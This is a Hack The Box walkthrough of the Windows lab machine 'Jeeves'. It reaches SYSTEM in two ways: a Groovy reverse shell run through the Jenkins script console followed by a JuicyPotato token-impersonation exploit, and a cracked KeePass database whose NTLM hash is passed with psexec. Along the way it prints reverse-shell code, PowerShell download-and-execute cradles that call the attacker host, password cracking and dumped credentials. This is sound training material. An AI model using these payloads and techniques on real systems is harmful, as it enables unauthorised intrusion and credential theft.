HTB - Jeeves
The given box Jeeves is a Windows machine with an IP address of 10.10.10.63
Recon
Nmap Scan Result
Performing nmap scan on the target
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.63
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 10:42 IST
Nmap scan report for 10.10.10.63
Host is up (0.28s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 5h06m22s, deviation: 0s, median: 5h06m21s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-20T10:19:24
|_ start_date: 2021-09-20T10:18:15
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 257.94 ms 10.10.14.1
2 259.94 ms 10.10.10.63
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.84 seconds
Enumeration
Enumerating SMB
Using smbmap to enumerate the SAMBA service
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.63
[!] Authentication error on 10.10.10.63
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.63 -u moni
[!] Authentication error on 10.10.10.63
No clues
Enumerating Web Services
There are two web services open, one on 80 and other one on 50000
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
Seems like, port 80/http is running on Microsoft-IIS/10.0
Finding exploit for that in searchsploit is a rabbit hole
On searching it with random inputs it shows error
But after analysing it, it is confirmed that it is a picture
It is showing some information regarding its windows version
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Web service on port 50000 runs on Jetty 9.4.z-SNAPSHOT
Nothing here
Directory bruteforcing for these two services takes more time,
Lets find any suitable directory with the keyword jeeves in the wordlist
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep jeeves -n
41607:askjeeves
59026:jeeves
68198:askjeeveslogo
166405:jeevesinc
Lets try these on both services
On port 80 its showing 404 Error
On port 50000 its showing some page,
Seems like a jenkins portal
Gaining Access
Since jenkins is a software development and maintainence application, lets look for input fields where we can pass our reverse shell payloads to gain user shell
After creating a project and tried submitting reverse shells script in multiple inputs, no luck
In jenkins it is said that, we can execute our own code in Script console
In Script console it is mentioned that we can run scripts in administrator level for the application
Here Groovy script is required to spawn a shell
Reverse shell in Groovy Script
String host="10.10.14.3";
int port=9876;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Lets run this script to spawn a reverse shell on our machine
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 9876 1 ⨯
listening on [any] 9876 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
...
C:\Users\kohsuke\Desktop>more user.txt
more user.txt
<---USER FLAG--->
Approach 1
Privilege Escalation
Lets try to escalate our privileges from user to NT AUTHORITY\SYSTEM
┌──(aidenpearce369㉿aidenpearce369)-[~/…/winPEAS/winPEASexe/binaries/Release]
└─$ ls
winPEASany.exe
┌──(aidenpearce369㉿aidenpearce369)-[~/…/winPEAS/winPEASexe/binaries/Release]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Downloading winPEAS on victim machine,
C:\Users\kohsuke\Desktop>powershell wget http://10.10.14.3:8000/winPEASany.exe -outfile privesc.exe
powershell wget http://10.10.14.3:8000/winPEASany.exe -outfile privesc.exe
C:\Users\kohsuke\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Desktop
09/20/2021 07:08 AM <DIR> .
09/20/2021 07:08 AM <DIR> ..
09/20/2021 07:09 AM 1,924,608 privesc.exe
11/03/2017 11:22 PM 32 user.txt
2 File(s) 1,924,640 bytes
2 Dir(s) 7,536,590,848 bytes free
After running this privesc.exe,
...
���������� Current Token privileges
� Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
SeShutdownPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeUndockPrivilege: DISABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
SeTimeZonePrivilege: DISABLED
...
So we have, SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
A good article about Windows Token Impersonation - link,
Lets check the privs for the user in cmd,
C:\Users\kohsuke\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
More references on token impersonation
Adding the below line to our Powershell Reverseshell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6767
Verifying it,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat rev.ps1| tail
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6767
Exploiting Admin
For this Token Impersonation we are going to use JuicyPotato.exe, because it is widely used for exploiting this kind of privilege abuse
Downloading the reverse shell via a .bat file,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat attack.bat
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:4545/rev.ps1')
Downlaoding JuicyPotato.exe
C:\Users\kohsuke\Documents>powershell wget http://10.10.14.3:4545/JuicyPotato.exe -outfile jp.exe
powershell wget http://10.10.14.3:4545/JuicyPotato.exe -outfile jp.exe
C:\Users\kohsuke\Documents>powershell wget http://10.10.14.3:4545/attack.bat -outfile attack.bat
powershell wget http://10.10.14.3:4545/attack.bat -outfile attack.bat
C:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Documents
09/20/2021 08:40 AM <DIR> .
09/20/2021 08:40 AM <DIR> ..
09/20/2021 08:40 AM 93 attack.bat
09/18/2017 01:43 PM 2,846 CEH.kdbx
09/20/2021 08:40 AM 347,648 jp.exe
3 File(s) 350,587 bytes
2 Dir(s) 7,535,763,456 bytes free
JuicyPotato launches a process with Impersonated Token which requires the program to be launched with escalated privilege and a listening address
C:\Users\kohsuke\Documents>.\jp.exe
.\jp.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
We can specificly run the attack.bat as our program with Impersonated Token, which triggers a reverse shell inside it
Now running JuicyPotato.exe,
C:\Users\kohsuke\Documents>.\jp.exe -t * -p attack.bat -l 7878
.\jp.exe -t * -p attack.bat -l 7878
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7878
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
It spawns a reverse shell with NT AUTHORITY\SYSTEM rights
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerShell running as user JEEVES$ on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd ../../
PS C:\> cd Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/24/2017 2:51 AM 36 hm.txt
-a---- 11/8/2017 9:05 AM 797 Windows 10 Update
Assistant.lnk
PS C:\Users\Administrator\Desktop> more hm.txt
The flag is elsewhere. Look deeper.
PS C:\Users\Administrator\Desktop>
It seems like the flag is hidden,
Look deeper?? Viewing hidden files
Reference Blog
PS C:\Users\Administrator\Desktop> Get-Item -path .\hm.txt -stream *
FileName: C:\Users\Administrator\Desktop\hm.txt
Stream Length
------ ------
:$DATA 36
root.txt 34
PS C:\Users\Administrator\Desktop> Get-Item -path .\hm.txt -stream root.txt
FileName: C:\Users\Administrator\Desktop\hm.txt
Stream Length
------ ------
root.txt 34
PS C:\Users\Administrator\Desktop> Get-Content -path .\hm.txt -stream root.txt
<---ADMIN FLAG--->
Approach 2
Privilege Escalation
Listing files in this directory,
C:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Documents
09/20/2021 08:40 AM <DIR> .
09/20/2021 08:40 AM <DIR> ..
09/20/2021 08:40 AM 93 attack.bat
09/18/2017 01:43 PM 2,846 CEH.kdbx
09/20/2021 08:40 AM 347,648 jp.exe
3 File(s) 350,587 bytes
2 Dir(s) 7,535,763,456 bytes free
Here there is an unusual file named CEH.kdbx
Transfering it from remote to local via SMB,
On local machine,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ impacket-smbserver temp .
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.63,49719)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)
[*] AUTHENTICATE_MESSAGE (\,JEEVES)
[*] User JEEVES\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:TEMP)
On victim machine,
PS C:\Users\kohsuke\Documents> dir
Directory: C:\Users\kohsuke\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/20/2021 8:40 AM 93 attack.bat
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx
-a---- 9/20/2021 8:43 AM 93 dummy.bat
-a---- 9/20/2021 8:40 AM 347648 jp.exe
PS C:\Users\kohsuke\Documents> New-PSDrive -Name "temp" -PSProvider "FileSystem" -Root "\\10.10.14.3\temp"
Name Used (GB) Free (GB) Provider Root
---- --------- --------- -------- ----
temp FileSystem \\10.10.14.3\temp
PS C:\Users\kohsuke\Documents> cd temp:
PS temp:\> cp C:\Users\kohsuke\Documents\CEH.kdbx .
PS temp:\>
Now, our file is in local, lets analyse it
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX
It is a keepass DB, we need a password to crack it
Lets use keepass2john to extract the hash of the password used,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ keepass2john CEH.kdbx > hash.txt
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat hash.txt
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Cracking the hash in john,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ john --list=formats | grep key
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
BKS, Blackberry-ES10, WoWSRP, Blockchain, chap, Clipperz, cloudkeychain,
itunes-backup, iwork, KeePass, keychain, keyring, keystore, known_hosts,
skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, solarwinds, SSH, sspr,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 130 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:05 DONE (2021-09-20 14:19) 0.01536g/s 844.6p/s 844.6c/s 844.6C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ john hash.txt --show
CEH:moonshine1
1 password hash cracked, 0 left
Now lets use kpcli to view the contents
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ kpcli -kdb CEH.kdbx
Please provide the master password: *************************
KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> ls
=== Groups ===
CEH/
kpcli:/> cd CEH/
kpcli:/CEH> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Backup stuff
1. Bank of America www.bankofamerica.com
2. DC Recovery PW
3. EC-Council www.eccouncil.org/programs/cer
4. It's a secret localhost:8180/secret.jsp
5. Jenkins admin localhost:8080
6. Keys to the kingdom
7. Walmart.com www.walmart.com
kpcli:/CEH> cd General/
kpcli:/CEH/General> ls
kpcli:/CEH/General> ls -la
kpcli:/CEH/General> cd ..
kpcli:/CEH> cd eMail/
kpcli:/CEH/eMail> ls
kpcli:/CEH/eMail> cd ..
kpcli:/CEH> cd Windows/
kpcli:/CEH/Windows> ls
kpcli:/CEH/Windows> cd ..
kpcli:/CEH> cd Internet/
kpcli:/CEH/Internet> ls
kpcli:/CEH/Internet> ls -la
kpcli:/CEH/Internet> cd ..
kpcli:/CEH> ls
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Windows/
=== Entries ===
0. Backup stuff
1. Bank of America www.bankofamerica.com
2. DC Recovery PW
3. EC-Council www.eccouncil.org/programs/cer
4. It's a secret localhost:8180/secret.jsp
5. Jenkins admin localhost:8080
6. Keys to the kingdom
7. Walmart.com www.walmart.com
kpcli:/CEH> show -f 0
Title: Backup stuff
Uname: ?
Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
URL:
Notes:
kpcli:/CEH> show -f 5
Title: Jenkins admin
Uname: admin
Pass:
URL: http://localhost:8080
Notes: We don't even need creds! Unhackable!
kpcli:/CEH> show -f 6
Title: Keys to the kingdom
Uname: bob
Pass: lCEUnYPjNfIuPZSzOySA
URL:
Notes:
kpcli:/CEH> show -f 4
Title: It's a secret
Uname: admin
Pass: F7WhTrSFDKB6sxHU1cUn
URL: http://localhost:8180/secret.jsp
Notes:
kpcli:/CEH> show -f 3
Title: EC-Council
Uname: hackerman123
Pass: pwndyouall!
URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login
kpcli:/CEH> show -f 2
Title: DC Recovery PW
Uname: administrator
Pass: S1TjAtJHKsugh9oC4VZl
URL:
Notes:
kpcli:/CEH> show -f 1
Title: Bank of America
Uname: Michael321
Pass: 12345
URL: https://www.bankofamerica.com
Notes:
kpcli:/CEH> show -f 7
Title: Walmart.com
Uname: anonymous
Pass: Password
URL: http://www.walmart.com
Notes: Getting my shopping on
kpcli:/CEH>
Exploiting Admin
Checking for other users in the victim machine,
C:\Users\kohsuke\Documents>net user
net user
User accounts for \\JEEVES
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
kohsuke
The command completed successfully.
After trial and error of the above combination,
Title: Backup stuff
Uname: ?
Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
URL:
Notes:
This one seems suspicious
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Looks like a NTLM hash
Lets use psexec.exe to get shell of Administrator using SMB via NTLM hash / Passs The Hash,
For more on psexec.exe
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00" Administrator@10.10.10.63
Impacket v0.9.24.dev1+20210906.175840.50c76958 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file nPBVBbGz.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service eHiw on 10.10.10.63.....
[*] Starting service eHiw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
...
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,491,067,904 bytes free
C:\Users\Administrator\Desktop>dir /R
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,491,067,904 bytes free
C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
<---ROOT FLAG--->